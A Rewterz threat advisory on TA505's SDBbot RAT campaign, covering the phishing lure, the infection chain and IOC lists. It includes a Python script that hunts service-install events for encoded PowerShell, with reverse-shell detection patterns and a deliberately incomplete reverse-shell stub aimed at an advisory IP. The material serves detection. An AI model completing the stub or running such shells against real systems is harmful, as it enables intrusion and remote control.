
Rewterz Threat Alert – TA505 Crime Gang Deploys SDBbot for Corporate Network Takeover

April 15, 2020

Severity

High

Analysis Summary

The TA505 cybercrime group has recently ramped up its attacks, with a set of campaigns aimed at spreading the SDBbot remote-access trojan (RAT) laterally throughout entire corporate environments. SDBbot is a custom RAT that has been observed in TA505 attacks since at least September 2019. It provides remote access, persistence and lateral movement, and carries spyware features, including the ability to exfiltrate data from compromised devices and networks.

In the most recent campaign, targeted emails were sent to enterprise employees in Europe. The emails purported to come from the HR department via Onehub, a legitimate cloud-based file-sharing application for businesses, and carried a macro-enabled document named simply "Resume.doc". When opened, the document ultimately delivered SDBbot through a dropper containing embedded dynamic-link libraries (DLLs) and an installer component. The campaign's aims were to collect Active Directory (AD) discovery data and user credentials and to infect the environment with the SDBbot RAT.

Once the malicious code was executed, it dropped a malicious DLL similar to Cobalt Strike, which in turn created and executed additional files. Three of these files make up SDBbot: an installer, a loader and the payload itself. A Meterpreter reverse shell was then used to remotely control compromised systems inside the internal network. It was installed as a Windows service whose command line executes an encoded PowerShell script; the encoded command decodes into a reverse shell that connects back to two malicious IP addresses. Analysts expect the group to keep targeting a wide range of industries, using social engineering to deliver both open-source and custom malware while constantly adjusting its TTPs and command-and-control (C2) infrastructure to evade detection.
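The service-install step described above, a new service whose command line runs PowerShell with an encoded script, is the most huntable part of this chain. The script below is an added example written for this advisory, not Rewterz tooling: it parses Event ID 7045 ("A service was installed in the system") records, decodes the -EncodedCommand argument (powershell.exe reads it as Base64 over UTF-16LE), and reports services whose decoded script connects to one of the advisory's Source IPs or shows reverse-shell traits. The flattened key="value" log format, the field names, the service names and the reverse-shell stub are all constructed for the example; the stub is deliberately incomplete.

```python
"""Hunt Windows service-install events for encoded PowerShell that decodes to
a reverse shell. Added example for this advisory, not Rewterz tooling; the log
format, service names and sample scripts below are constructed."""
import base64
import re

# Source IPs from the advisory, kept defanged so the file is safe to share.
DEFANGED_IOC_IPS = ["91[.]214[.]124[.]25", "91[.]214[.]124[.]20", "185[.]176[.]221[.]45"]


def refang(ioc: str) -> str:
    """Turn a defanged indicator back into a matchable value."""
    return ioc.replace("[.]", ".").replace("[:]", ":").replace("hxxp", "http")


IOC_IPS = {refang(ip) for ip in DEFANGED_IOC_IPS}

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -enc,
# -encoded, ...) plus the special-cased -ec; try the longest names first.
_ENC_NAMES = sorted({"encodedcommand"[:i] for i in range(1, 15)} | {"ec"}, key=len, reverse=True)
ENC_ARG = re.compile(r"-(?:" + "|".join(_ENC_NAMES) + r")\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
# Assumed flattened key="value" export format for the constructed log lines.
EVENT_FIELDS = re.compile(r'EventID=(?P<id>\d+).*?ServiceName="(?P<svc>[^"]*)".*?ImagePath="(?P<path>[^"]*)"')
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
# Traits of a PowerShell TCP reverse shell; two or more together is a strong signal.
SHELL_TRAITS = {
    "tcp_client": re.compile(r"Net\.Sockets\.TCPClient", re.IGNORECASE),
    "stream_io": re.compile(r"\.GetStream\(\)", re.IGNORECASE),
    "eval": re.compile(r"\b(?:iex|Invoke-Expression)\b", re.IGNORECASE),
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE),
}


def decode_encoded_command(b64: str):
    """Decode a -EncodedCommand blob; None if it is not valid Base64/UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_image_path(image_path: str) -> dict:
    """Decode and score one service ImagePath; an empty dict means nothing to report."""
    m = ENC_ARG.search(image_path)
    if not m:
        return {}
    decoded = decode_encoded_command(m.group(1))
    if decoded is None:
        return {}
    traits = sorted(n for n, rx in SHELL_TRAITS.items() if rx.search(image_path + " " + decoded))
    ioc_hits = sorted(set(IPV4.findall(decoded)) & IOC_IPS)
    if not ioc_hits and len(traits) < 2:
        return {}  # encoded PowerShell alone is noisy; require an IOC hit or two traits
    return {"decoded": decoded, "traits": traits, "ioc_ips": ioc_hits}


def hunt(log_lines) -> list:
    """Return one finding per 7045 event whose ImagePath decodes to a reverse shell."""
    findings = []
    for line in log_lines:
        ev = EVENT_FIELDS.search(line)
        if not ev or ev.group("id") != "7045":
            continue
        verdict = analyse_image_path(ev.group("path"))
        if verdict:
            findings.append({"service": ev.group("svc"), **verdict})
    return findings


def encode_command(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed samples: a deliberately incomplete stub with the shape of a TCP
# reverse shell aimed at an advisory IOC, and a harmless encoded command.
REVERSE_SHELL_STUB = ("$c = New-Object System.Net.Sockets.TCPClient('91.214.124.25', 443); "
                      "$s = $c.GetStream(); # read / iex / write loop omitted")
BENIGN_ENCODED = "Get-Date | Out-File C:\\ProgramData\\heartbeat.txt"

# Constructed 7045/7036 lines in the flattened export format assumed above.
SAMPLE_LOG = [
    '2020-04-15T09:12:03Z EventID=7045 ServiceName="WinUpdateSvc" ImagePath="%COMSPEC% /b /c '
    f'start /b /min powershell.exe -nop -w hidden -encodedcommand {encode_command(REVERSE_SHELL_STUB)}" '
    'StartType="auto start"',
    '2020-04-15T09:12:09Z EventID=7045 ServiceName="Heartbeat" '
    f'ImagePath="powershell.exe -ec {encode_command(BENIGN_ENCODED)}" StartType="demand start"',
    '2020-04-15T09:13:11Z EventID=7045 ServiceName="WdNisSvc" '
    'ImagePath="C:\\Windows\\System32\\svchost.exe -k netsvcs" StartType="auto start"',
    '2020-04-15T09:14:00Z EventID=7036 ServiceName="Spooler" ImagePath="" State="running"',
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"[!] service {f['service']!r} traits={f['traits']} ioc_ips={f['ioc_ips']}")
        print("    decoded:", f["decoded"])
```

Run against an export of your own System log (for example from wevtutil or your SIEM) once it is flattened into the same form. Encoded PowerShell on its own is common in many fleets because management agents use it legitimately, which is why the scoring requires either a hit on an advisory IP or at least two reverse-shell traits; tune SHELL_TRAITS and the IOC list to your environment.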

Impact

  • Credential Theft
  • Unauthorized Remote Access
  • Data Exfiltration
  • Network-wide Infection

Indicators of Compromise

Domain Name

  • drm-server-booking[.]com
  • microsoft-live-us[.]com
  • dl1[.]sync-share[.]com
  • office365-update-en[.]com
  • d1[.]syncdownloading[.]com
  • googledrive-download[.]com
  • update365-office-ens[.]com
  • office-en-service[.]com
  • news-server-drm-google[.]com

MD5

  • edbe98468cd888bf029bc8e297a310b3
  • 994104c30d57141a99e0e414ef2d8837
  • ab9103c8fd35ec7b5a99e463a2f8fc59
  • 61b94dfc9bea1a876b140a72c450e4bb
  • cd1096991867bb5ad72b983441bfe04b
  • e14d7460f62a122d85a2ce1b69080497
  • 0fdb43fc559a35afcc422b786f45a997
  • bc59fa5dbb11f5d286fc41e8f25c6cc0
  • 888fa9c56b06cf6255142e2c592b2437
  • 945fff5b2d903ccc0787f41a9ba6df98

SHA-256

  • 7be0da2a873fe10fadb76b241460badbd5d6533237e99ca7a59f4b6676edcc33
  • a04d0cb7362e3650239230b40fac1d2d42357cec1ded2e78456e49dd6713b470
  • 1cbad7cdb6a27a48c98a75b28ca2c63116440dd7891f7300e2109d36b8aae7a1
  • 169f8f4798d048e1c50dac25417ad639b951571a371346401cc981d677b2d5ac
  • e12e250047a8074c9f68199b81b05414ec5461a9e94af225ba3896948dad882e
  • c850d3b6c9a8a8af6072e79fa1430bb1d2290d2b59ccfe6b2edb5a6de1464326
  • 50bf52cbfcdfa125120b7b7b79218a0a09cbd8b5fac4db1be35dc63f7e557ec8
  • 0e40ba8c2c0a2fcbb5290d131bb42651f90f33f5e230556736a5acb4ffd4251d
  • 238d40bbc430c6098a8ad4682ac3722e36b1d2e91fc9030124e5152b6b186e94
  • bc7ea56a2dd0f7a2db378da4565c6fe97968e1387f2e16d3adb82fd75e53d33a

SHA1

  • bf0f7abda2228059bb00ec9658ee447fbe84d277
  • d40510da42a478d72e649993208710668a7f6c27
  • 0cc7cca16afd632857e3883c06b2f55c057b563e
  • d36e983886a084887f887c6d562d3bc0664587c4
  • fea7d944e317c7b2ef1aba57600a8c5310368085
  • 35423e04e58ab1f2267e19c47e1c69ea5b7041cc
  • fd9620c0c295caaee3096423532bb1dbfb7064c5
  • cb0b39534d99057b02b090c3650fb1de43d19a02
  • caff1d315a5d87014e5fa62346f58407755d971e
  • 45c43ec18d15ba7850e6ad2e2e54671636f4d926

Source IP

  • 91[.]214[.]124[.]25
  • 91[.]214[.]124[.]20
  • 185[.]176[.]221[.]45

URL

  • https[:]//clck[.]ru/JnFFT
  • https[:]//clck[.]ru/JnFFT&data=02|01||bed42450519b40df

Remediation

  • Block the threat indicators at their respective controls: domains and IPs at the DNS resolver, web proxy and perimeter firewall, file hashes at the endpoint protection platform. Note that clck[.]ru is Yandex's public URL shortener, so block the listed short links rather than the whole domain.
  • Do not download or open unexpected attachments, particularly macro-enabled documents, from untrusted or unverified email addresses, and block macros in documents received from the internet where business processes allow.
  • Ensure employee awareness of the latest phishing emails and subjects, such as the HR "Resume.doc" lure used in this campaign.
  • Hunt for newly installed services whose command line launches PowerShell with an encoded command, and for outbound connections to the listed IP addresses.
COPYRIGHT © REWTERZ. ALL RIGHTS RESERVED.